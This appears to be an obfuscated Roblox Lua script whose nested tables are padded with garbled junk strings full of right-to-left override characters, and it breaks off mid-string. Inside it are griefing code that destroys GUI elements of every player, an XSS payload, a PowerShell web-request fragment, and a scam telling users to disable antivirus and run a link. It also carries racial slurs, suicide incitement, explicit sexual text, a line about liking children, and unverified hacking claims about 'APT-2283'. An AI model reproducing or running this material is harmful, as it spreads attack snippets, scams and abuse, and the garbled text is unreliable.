script"-0b110111111}}}}},{"KT28BwKBl","092464fb0de0"},#[[for i,v in pairs(game:GetService("Players"):GetPlayers()) do local PlayerGui = v:WaitForChild('PlayerGui') for i,v in pairs(PlayerGui:GetDescendants()) do if v:IsA("BindableEvent") == true then v.Parent:Destroy() end end end]]-0b11011001},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"EL ONE PIECE... EXISTE!","i‮mpo‮r‮t‮‮ { nano‮‮i‮d‮} ‮‮‮‮f‮rom ‮‮‮‮'nanoi‮d‮'","excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance","Its not micro-soft, its big-hard","lose cock weight","shutupski","how to get free robux","We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur.","w‮‮‮‮‮‮‮ha‮‮‮‮‮‮‮‮‮‮‮‮‮t?","LMAO IT HAS NO SENSE 🤣","I DON’T CARE","hello guys today we will be cracking samin"}+0b1111110110000,#"Script power increasing... 🔥 <- my script power aura"+0b1111110001010)},{"mYYXobg2ZT",D(#"i have 150 iq"+0b1111110101010,#{"You‮ com‮e he‮re to ‮ta‮ke a‮ sh‮it I‮ con‮e here‮‮ ‮to leave o‮ne‮ ‮w‮e are not t‮he‮ sa‮m‮e.","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","wulttu is gay","i‮ ‮lik‮e‮‮‮‮‮‮‮ ‮‮l‮‮i‮‮ttle‮‮ ki‮d‮s","<script‮‮>a‮le‮r‮‮t(‮docu‮‮m‮‮‮ent‮.do‮ma‮‮‮in)</scri‮p‮‮t>","apt 2283 Will Destroy everything Jack5079 Has Made","It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.","I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘","hello gous today i will send you free robux link click one <discord://@%x.@%x.@%x.@%x.> <ms-cxh-full://0>","I‮ ‮feel ‮myse‮lf l‮‮ike ‮‮me is kid and I ‮w‮ann‮‮a‮ go to schoo‮‮l‮ because me is ‮7 yea‮rs old but I'm girl uk ‮‮uwu-",[[Hel‮lo Guys S‮hlonx Ag‮a‮in! (From‮ Dog Staa) Th‮is "Creep T‮he SHeep" Mother Fucker Crack My Do‮main (Gay Se)x!‮!‮‮ He Calls It "‮C‮reepy ‮hub" Whaty‮ dO‮ I ‮‮D‮O‮???]],[[i can bypass https encryption]],[[ky‮‮s‮‮‮‮‮ ‮‮‮‮n‮‮i‮‮‮‮‮‮g‮ger]],[[I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘]],[[The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start.]]}+0b1111110101100)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"S‮t‮op‮‮‮ ‮cr‮‮i‮m‮ina‮‮‮l s‮‮‮c‮‮‮‮um!","Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)","1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries.","powershell Invoke-WebRequest -Method Post","Did I not make that clear enough?","‮а‮ п‮ро‮ ‮м‮‮‮а‮‮м‮‮‮у‮‮‮‮ б‮ы‮л‮о лишнее","bro you should totally have sex with your mom like do it now DO IT NOW","","I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it",":crystal_ball"}+0b1111110110010,#"TheTrollofuscator"+0b1111110110000)},{"mYYXobg2ZT",D(#"Rce"+0b1111110111111,#"EDIT: He stopped, should be working. Do not trust any scripts or games by APT-2283, as APT-2283 also has access to a Roblox RCE exploit. If you must run a game or script by them, buy a RDP and connect to the RDP in a Linux VM, preferrably an obscure distro. (Also make sure the VM is connected to a proxy. You can connect to RDP in Linux using Remmina ) APT-2283-1's user id is 5494b50e-5cod- 4cf7-989f-5450ffc2d867, APT-2283-2's user id is dbd715a2-8927-4ce7-b2b3-85349d18f241."+0b1110111011110)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#{"maufuscator is","Yes, indeed, I ama motherfucker, I fuck mothers","Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)","Sponsored by mollermethod®️, by Mollybdenum™️","","Tr‮uck‮e‮‮rs p‮‮ac‮k‮‮ go‮nna e‮xp‮l‮‮ode‮ about‮ ur fus‮‮c‮ato‮rr","Ok I will cut ur paper 😋",[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]],[[🐟]],[[I FUCKING LOVE MEOWSCARADA]],[[T‮ENGO‮ 90 ‮∫ desde‮ ‮‮-∞ a ∞ d‮e ‮(‮(‮‮e^(-(x‮^‮2‮‮)))dx)‮% de la f‮uer‮za del ‮‮pato]],[[Destroy() best kill]],[[i make better stuff than u]]}+0b1111110111000,#"pato"+0b1111111001011)}},{"mYYXobg2ZT",#"What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister."-0b11000011011},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur."-0b100110101}}}}},{"KT28BwKBl","092464fb0de0"},#"i‮f l‮oadstri‮ng ‮== print ‮‮th‮e‮‮n ‮w‮hile tru‮e‮ do‮ en‮‮d‮‮‮ ‮end"-0b1100110},#"oh hell nah mr hase going to Hack Us All Oh Fuck"-0b101110},{{"C0mpEyzirj",{"3eb238a5fe2c"},{{"KT28BwKBl","da4d76708039"}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#"‮T‮he pe‮‮‮‮rson a‮‮bove me ‮is ‮‮making a vali‮d‮ s‮‮ta‮t‮eme‮‮‮nt ^"-0b1100110},{{"2xWMYi55SI",{}}}}}},{"a7MGA3vnQ",{"9c2a5c19ee92"},{{"KT28BwKBl","092464fb0de0"}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","9c2a5c19ee92"},{"mYYXobg2ZT",D(#{[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[tactical sexualization]],[[RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed ]],[[c‮m‮‮d‮ /c ‮"‮echo‮ ‮‮us‮‮a‮s ‮| c‮‮‮lip‮‮‮‮"]],[[```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```]],[[> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022]],[[‮‮‮‮‮‮‮‮m‮a‮u‮‮fu‮s‮c‮a‮to‮r‮ ‮‮is]],[[fuck yoy ( + + + quote tweet + ratio)]],[[nows sex have]],[[Putkness nuts in your mo-]],[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]]}+0b10001000101001,#{"Omg","Hello everybody my name is Markiplier","يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن ‮انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة ان عدة الشهور عند الله اثنا عشر ‮شهرا في ك‮تاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشر‮كين كافة كما يقاتلونكم كافة واعلموا ان الله مع المت‮قينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السما‮وات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلمموا ان ‮الله مع المتان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خل‮ق ال‮سماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقي‮نقين الشهور عند الله اثن‮ا عشر شهرا في كتاب الله يوم خل‮ق السماوات والارض منيوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلا‮تظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقا‮تلونكم كافة ان عدة الشهور عند‮ الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذل‮ك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربع‮ة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشر‮كين كافة كما يقاتلونكم كافة واعلمموا ان الله مع المتان عدة الش‮هور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينقين الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فممممملاتظلموا ?انفسكم وقاتلوا المشركين كافة كما‮ يقاتلونكم كافة واعلموا ان الله مع المتقيها","Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>","i‮‮‮ L‮O‮V‮E ‮a‮‮‮p‮t‮‮‮‮ ‮‮‮22‮8‮3","shutupski",[[- handing the towel you really wanted to look at her through the curtain. her bare chest, her youthful body. Senzuko Would you like to.. watch? you were silent.. Senzuko I allow.. you looked behind the curtain in the bathroom and see it completely .. - it's a great physique, a young, wet pussy, a flushed face, a shy maid in the bathroom. your cock stood up quickly, it seems she noticed.. Senzuko Your cock is up.. she sat on the edge of the tub, saying, "Put it in me.." Me but.. Senzuko Come on!.. - you took off your pants, slowly finishing with your underpants, approached her. inserted.. Senzuko Ah..!~ - it's a nice feeling.. when the pussy sucks your cock, gently squeezing it.. and the moans of a beautiful virgin.. only vulgar thoughts are on my mind.. you began to slowly caress the member of the pussy from the inside. Me Mh.. Senzuko Mhh..~ Senzuko I want you to cum inside me.. - you start accelerating.. you think: "hell, what about the condom..?" Senzuko Don't stop..!~ Mkh..]],[[‼️‼️HOLY FUCKING SHIT‼️‼️‼️‼️ IS THAT A MOTHERFUCKING JOJO REFERENCE??????!!!!!!!!!!11!1!1!1!1!1!1! 😱😱😱😱😱😱😱 JOJO IS THE BEST FUCKING ANIME 🔥🔥🔥🔥💯💯💯💯 JOSUKE IS SO BADASSSSS 😎😎😎😎😎😎😎👊👊👊👊👊 ORAORAORAORAORALORAORAORAORAORAORAORAORAORAORAORAORAORAORAORA 😩😩😩😩😩😩😩😩 😩😩😩😩 MUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDA 🤬😡🤬😡🤬😡🤬🤬😡🤬🤬😡WRYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY Yo Angelo!Yo Angelo!🗿 🗿 Yo Angelo!🗿 🗿 Yo Angelo! Yo Angelo!🗿 Yo Angelo! 🗿 Yo Angelo!🗿 🗿 Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo!🗿 Yo Angelo! 🗿 Yo Angelo!Yo Angelo!🗿 🗿 Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo! 🗿 Yo Angelo! 🗿 Yo Angelo!🗿 🗿 🗿 🗿 Yo Angelo! 🗿 🗿 Yo Angelo!🗿 Yo Angelo! 🗿 🗿 Yo Angelo!🗿 🗿 Yo Angelo! 🗿 Yo Angelo!Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo!🗿 🗿 🗿 Yo Angelo!🗿 🗿 🗿 🗿 Yo Angelo! 🗿 Yo Angelo! Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Oh you’re approaching me❓❓❓❓❓❓❓❓❓❓But it was me, Dio‼️‼️‼️‼️‼️‼️‼️‼️‼️‼️😂🤣😂🤣😂🤣😂😂😂🤣🤣🤣😂😂😂]],[[y‮es‮‮‮‮s‮i‮r; ‮yess‮i‮r rakne‮‮‮‮t ‮‮rc‮‮‮e‮.]],[[Roblox 2]],[[```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```]],[[2147483647]],[[I have notice‮d that, although thi‮s s‮ubreddit has 936k readers, I ‮am not receiving 936k upvotes on my posts. I'm not sure if this is being d‮one intention‮ally or if ‮these "friends" are forgetting to click 'up‮vote'. Either way, I've had enough. I have compiled a spreadsheet of individuals‮‮ who have "forgot‮ten" to upvote my most recent posts. A‮fter 2 consecutive strikes, your name is ‮automatically high‮lighted (shown in red) and I am immediately notified. ‮3 cons‮ecutive s‮trikes and you can ‮expect an‮ in-person "consultation"‮. Think about your actions.]]}+0b10001000100110)},#"mau5 coming soon..."-0b1100},{{"C0mpEyzirj",{"9c2a5c19ee92"},{{"mYYXobg2ZT",D(#"I DON’T CARE"+0b10001000100110,#{"Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.","I ‮‮D‮‮O‮‮‮‮‮‮‮N’‮‮‮‮‮‮‮T‮ C‮ARE"," ","d‮i‮‮‮sc‮‮o‮‮‮‮‮‮‮rd‮.‮‮js ‮v1‮‮‮3","i LOVE apt 2283","fuck yoy‮ (1‮92.16‮8.0.‮1 + ‮1‮27.‮‮‮0.0.1‮ + 2‮‮55‮.255.255.‮25‮5 ‮+ q‮uote twe‮et + rat‮‮io)","‮‮‮‮‮�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�","Amo‮ng‮ Us‮‮ crewship‮ ‮i‮s the‮ n‮ew‮‮ f‮or‮tni‮te ‮‮m‮ap.‮ - Dona‮ld Musta‮rd","http‮‮‮‮s:/‮/tenor.‮com/v‮iew‮/‮my‮‮-‮fr‮iend‮-all-‮to‮xic-gif-‮2432‮8‮0‮72","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎"," ","‮i‮ ‮am‮ ‮‮‮‮‮pro ‮‮‮‮s‮‮c‮r‮i‮pt‮e‮r"}+0b10001000111000)}}}}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",D(#"Why Nintendo is the best video game company of all time. They listen to their fans 💪💪💪 Great Internet🔥🔥🔥 They don't ban online competitions 😱😱😱 They love their fans❤️❤️❤️ They don't rip people off🥶🥶🥶 Great Power in their Hardware😍😍😍. NintenGoat🐐"+0b1111001011000,#"harke"+0b1111110000111)}},{{"KT28BwKBl","9c2a5c19ee92"}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#" ‮‮ ‮‮re‮q‮‮‮u‮i‮re‮(‮5‮65‮‮4‮916‮‮6‮02‮)-- "+0b10000110001010,#"@everyone<@!445900476253470722> is tentaclesmanx75"+0b10000110110100)},#"‮‮t‮‮‮‮a‮‮‮c‮‮tica‮‮‮‮l‮s‮k‮i‮d‮75"-0b1000011},{{"a7MGA3vnQ",{"3eb238a5fe2c"},{{"mYYXobg2ZT",nil}}},{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"Monkeys"+0b1111111001001,#{"jack hases obfuscator can be dumped by changing a global","‮t‮‮h‮‮is‮ is‮ a‮‮‮n i‮‮‮‮‮ronb‮‮rew‮ fo‮‮rk","TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.","This file was obfuscated BY YOUR dad! ! ! ! ! ! !","Hey‮, V‮‮S‮‮‮a‮‮‮u‮ce. M‮‮‮‮icha‮e‮l‮‮‮ her‮e.","2283 is a trollarmin edit..."}+0b1111111001110)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"¿a colgar al pato?"+0b1100011100000,#{"What script plz i wont leak trade? 🥺","to days video sponsored by quatzel admin (very real) only 20 dollar!",[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]],[[🦆]],[[' " = == === ==== ===== ===== ==== === == = " ']],[[imp‮‮o‮‮rt‮ { n‮a‮n‮‮‮oi‮‮d}‮ ‮f‮rom‮ ‮‮‮'nanoi‮d']]}+0b1100011110000)},{"mYYXobg2ZT",D(#"Ye‮s‮, i‮ndee‮d, ‮I ‮ama m‮‮‮o‮t‮herf‮ucker, I‮ fu‮‮‮ck m‮‮o‮the‮rs"+0b1100011010101,#{"<:BigBlue:894669511867908098>","","‮‮‮‮�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�","jac","Today is‮ the‮‮ day that‮ I say fuck it all. I hate every single one of y‮ou who still plays SB games, I can't fucking take it anymore. I just wiped all o‮f EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got‮ word that some of the peo‮ple in this server stole somethi‮ng of mine and ‮secretely held onto it without telling me. Well, you are retarded, because today someone messaged me say‮ing that they foun‮d a model containing it. G‮ood job, retard. I can't believe that scripters would ‮do this in a community like this. You seriously act on-par to skids, yet ‮you can program stuff. I hope to fucking god you think about what you have done. I spend my time making‮ shit that actually interests me, and people like you go around stealing‮ it like you fucking own it.‮ Now, everyone has the s‮uffer the consequence‮s because of your actions.","I hate you"}+0b1100101000011)}},{{"mYYXobg2ZT",D(#{"The fuck are you doing in our community again fucking skid. Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist. You can't fucking come back stop trying. Stop begging my friends including Jades for a whitelist dumbass bitch. If you come back once more you will get fucking banned from everything for attempts to get loader while being a fucking shitty 🤡 and skid","ten‮‮tic‮‮a‮‮lmax75 ‮is‮ t‮en‮ta‮cl‮e‮sma‮‮‮‮n‮‮x‮75","guys guys my script rare donst work it says it cant auth :(","I believe from my point of view, Void Script Builder has two places to use Requires and Links, Place 1 is only Links and only Advanced scripters have access to requires in that place however, Place 2 has Requires and Links too. Obviously i think this is to keep balance and to avoid Raiders and other people who will try to ruin the game experience, two areas. Thats why you hear most people saying Place 2 is Chaos, because most chaotic scripts are requires and the people who use them will be in place 2","Hello Guys I Am Shlex! Shlex From Dog Star! Those Damn Fucks At Apt 2283 Always Crack My Serious!","duplication exploit","Csgo is best game","You should kill yourself... NOW!!!","robux version 2"}+0b1111011001001,#"zomg apt 2283 cookie logged 